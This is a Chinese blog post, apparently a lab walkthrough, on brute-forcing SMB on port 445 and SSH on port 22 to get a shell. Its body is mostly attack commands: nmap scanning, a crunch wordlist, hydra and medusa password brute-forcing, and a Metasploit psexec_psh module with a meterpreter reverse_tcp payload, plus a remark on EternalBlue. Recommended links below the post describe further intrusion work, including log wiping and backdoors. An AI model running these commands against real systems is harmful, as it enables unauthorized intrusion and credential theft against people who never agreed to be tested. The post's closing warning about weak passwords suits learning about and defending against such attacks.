爆破445端口和22端口拿shell

最新推荐文章于 2024-07-23 11:58:10 发布
最新推荐文章于 2024-07-23 11:58:10 发布
阅读量4.3k 收藏 24
点赞数 2
分类专栏: web安全 kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44902875/article/details/105215333
版权

工具hydua、nmap
使用nmap扫描是否开启smb服务即445端口

nmap -O 172.168.172.131

在这里插入图片描述
发现开启,制作字典passwd.txt

crunch 1 4 1234 -o passwd .txt

在这里插入图片描述

hydra -l hack -P passwd.txt smb://172.168.172.131 -f -vV

在这里插入图片描述
密码爆破成功

在这里插入图片描述
启动msf
在这里插入图片描述
使用模块:

user exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

show options

在这里插入图片描述

set rhost 172.168172.131
set smb pass 123
set smbuser hack
set lhost 172.168.172.15

在这里插入图片描述
使用exploit(windows/smb/ms17_010_eternalblue)攻击win2008等都是把他们打重启,醉了。
在这里插入图片描述
ssh爆破

medusa -M ssh -h 172.168.172.139 -u root -P passwd.dic

在这里插入图片描述
所以最好别设置太简单的密码

佛性死磕
关注
  • 2
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
子域名遍历+端口爆破+目录扫描+文件上传getshell-实战外网打点
ZeroDay001的博客
02-04 931
接下来就是舒服的内网渗透了,上一台机器查看装有火绒,将事先免杀处理好的马传上去,上线到cs,便于读取密码,但是并没有将密码读取出来,然后立马转变手法,直接导出lsass进程的dmp文件,通过本地离线读取,成功获取到。然后我们直接将上述数据包保存,sqlmap一把梭,确实存在注入,但是无法--os-shell,所以无法进行更深一步利用,虽然我读取了站点管理员账户密码,进后台一顿操作,依旧没有可以利用的点,此路不通,放弃。给定的资产,虽然给的不多,但是根据以往打攻防的经验来看,大概率有东西,如下,厚码请见谅!
〖教程〗LadonGO MongoDB密码爆破27017端口
K8哥哥
07-27 970
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,12种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/Mong
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
Python 渗透测试:SSH 加密通道 传输文件 爆破.(22 端口
网络安全领域___专研者.
05-17 415
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络环境中进行安全的远程连接和数据传输。SSH 爆破是一种常见的网络攻击手段,它试图通过暴力破解的方式获取远程 SSH 服务器的登录凭证。
kali linux网络安全弱口令爆破常用命令(二)
最新发布
qq_53058639的博客
07-23 869
KaliLinux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。要尝试破解的目标主机的IP地址或域名。目标主机上服务运行的端口号。目标主机上服务使用的协议,如SSH、FTP等。目标主机上服务的类型,如SSH服务的用户名枚举、密码破解等。指定Hydra使用的攻击方法,如暴力破解、字典攻击等。
端口渗透--22--SSH
m0_53623841的博客
10-12 1242
打开win10上的设置--应用--可选功能--添加功能--openssh。找到防火墙上的高级设置,在入站规则中新建规则,端口22,点击下一步安装。(因为是实验,所以提前在win10上开启ssh服务,确保22端口打开)用nmap进行信息收集,可以看到靶机开放了22端口的ssh服务。所以账号为:xiaoxiao,密码为:123456,直接连接。同样可以看到账号:xiaoxiao,密码:123456,连接。直接进行暴力破解,可以看到,第一条数据有一个成功的标识。win+R--输入services.msc。
应用协议安全:Hydra 端口爆破工具.(九头蛇)
网络安全领域___专研者.
05-16 3495
Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、SSH、FTP 等服务.
工具源码.zip_c段查询_getshell_漏洞扫描_爆破_端口爆破
07-13
工具功能 1:漏洞扫描 2::0day测试 3:cms漏洞扫描 4:旁注c段查询 5:sql注入攻击 6:SQL注入检测 7:漏洞URL采集 8:CMS识别 9:Getshell自动 10:穷举爆破 11:漏洞爬行 12:安全文章对接推送 ...16:端口扫描
〖教程〗Winrm远程命令/WinrmCmd/端口复用后门/Windows密码爆破
K8哥哥
05-30 6496
简介 WinRM是WindowsRemoteManagementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。 Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。 PS:WIN7或20
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! ...
445端口攻击详解/教学
03-22
445端口攻击 详解/教学 仅供教学。 后果自承,私人收藏
端口爆破是什么意思/针对Web与系统端口层面的密码穷举爆破_小白信息安全知识点
程序员六七的博客
05-09 483
关于这篇文章本文适合刚刚接触的初学者进行学习 写本文即是对本人知识点的整理也是为了学习 (求各位大牛指出本文的不足和说错的地方) 文章内容相对来说有点长长长长
计算机端口爆破,Tomcat8080端口爆破及原理 | kTWO-个人博客
weixin_42388680的博客
07-26 1424
Tomcat是非常常见的web服务程序,但是,有些管理员对Tomcat不熟悉,导致配置不当,很容易就会被入侵,使用8080爆破工具扫描很容易就能找到大量的不安全不服气,也很容易被提权,博主之前也使用该工具进行爆破,后来就先弄清楚其原理,经过后来的研究终于弄明白了Tomcat的登陆认证原理。下面进入正题。一、Tomcat基础认证说白了就是登陆tomcat。例子:http://101.201.151....
shell实现自动化扫描主机端口爆破服务弱口令
chaojixiaojingang
08-11 2826
今天看同学写了用shell实现自动化扫描主机端口爆破服务弱口令,感觉很有用,将来进公司可以方便我完成一些工作。 需求 假设现在有一个需求,公司分配给你了一个ip列表,要求你将其中存活的主机筛选出来,检查这些主机是否开启了常用的服务,以及是否存在弱口令。 一般常用的做法就是先利用nmap扫描出存活主机,然后扫描这些主机开放的端口,用hydra对这些端口进行弱口令安全检查。如果将这些命令写在一个sh...
渗透测试(445端口
qq_45433707的博客
05-23 2324
笔记 由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到) 1.授权 2.信息收集(nslookup whois) 3.扫描漏洞 ​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描; ​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0 ​ 扫描网站漏洞(十大网站漏洞 ) 4.漏洞利用 5.提权(shell环境命令控制权,桌面环境,最高权限) =======删库跑路 6.毁尸灭迹(删除日志) 7.留后门 8.
445端口的暴力破解
u011250160的博客
08-02 2288
目标IP:192.168.1.19 用nmap扫描目标端口发现445是开着的 ping一下看看能不能ping通 然后使用hydra进行暴力破解,这里使用的是一个简单的字典文件 破解成功会出现如下图 另一种方法也可以使用msf里的模块 失败的截图 成功的截图 ...
hydra(九头蛇)爆破常见端口
guanjian_ci的博客
05-11 5838
整理一下 hydra 端口爆破命令语法 目录: 简介 1. 21端口爆破命令 2. 22端口爆破命令 3. 1433端口爆破命令 4. 3306端口爆破命令 5. 3389端口爆破命令 6. smb服务爆破命令 7. imap服务爆破命令 总结 简介 hydra 也称九头蛇, 是著名黑客组织thc的一款开源的暴力密码破解工具,可以破解多种密码。 1. 21端口爆破命令 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务, FTP服务主要是为
kali之端口爆破扫描
sinat_38378265的博客
03-25 4490
一.nmap扫描端口情况 在终端输入nmap+目标机的ip,即可对目标机的ip的端口进行扫描。 二.使用hydra对目标端口进行爆破 1.首先了解哪些目标端口可以爆破的 文件传输协议ftp:21 Linux的远程连接ssh:22 telnet的远程连接:23 pop3端口:110...
3389端口爆破字典
09-23
3389端口爆破字典可以使用Hydra工具进行制作,你可以手动输入常见的弱口令,也可以使用工具生成字典文件。以下是使用Hydra工具进行3389端口爆破的示例命令: hydra IP地址 rdp -L 用户字典 -P 密码字典 -V 例如: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值